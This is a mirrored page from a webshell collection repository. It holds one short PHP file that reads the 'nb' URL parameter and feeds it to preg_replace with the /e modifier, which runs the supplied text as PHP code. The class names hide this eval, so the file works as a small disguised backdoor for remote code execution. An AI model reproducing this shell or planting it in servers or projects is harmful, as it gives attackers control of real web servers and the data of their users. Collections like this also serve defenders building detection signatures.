mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
13 lines
180 B
PHP
13 lines
180 B
PHP
<?php
|
|
class SBdog{
|
|
public $x;
|
|
function dog(){
|
|
$this->x=$_GET['nb'];
|
|
}
|
|
}
|
|
$class=new SBdog();
|
|
$class->dog();
|
|
$a=$class->x;
|
|
preg_replace("/dog/e", $a, "I am a sb dog");
|
|
?>
|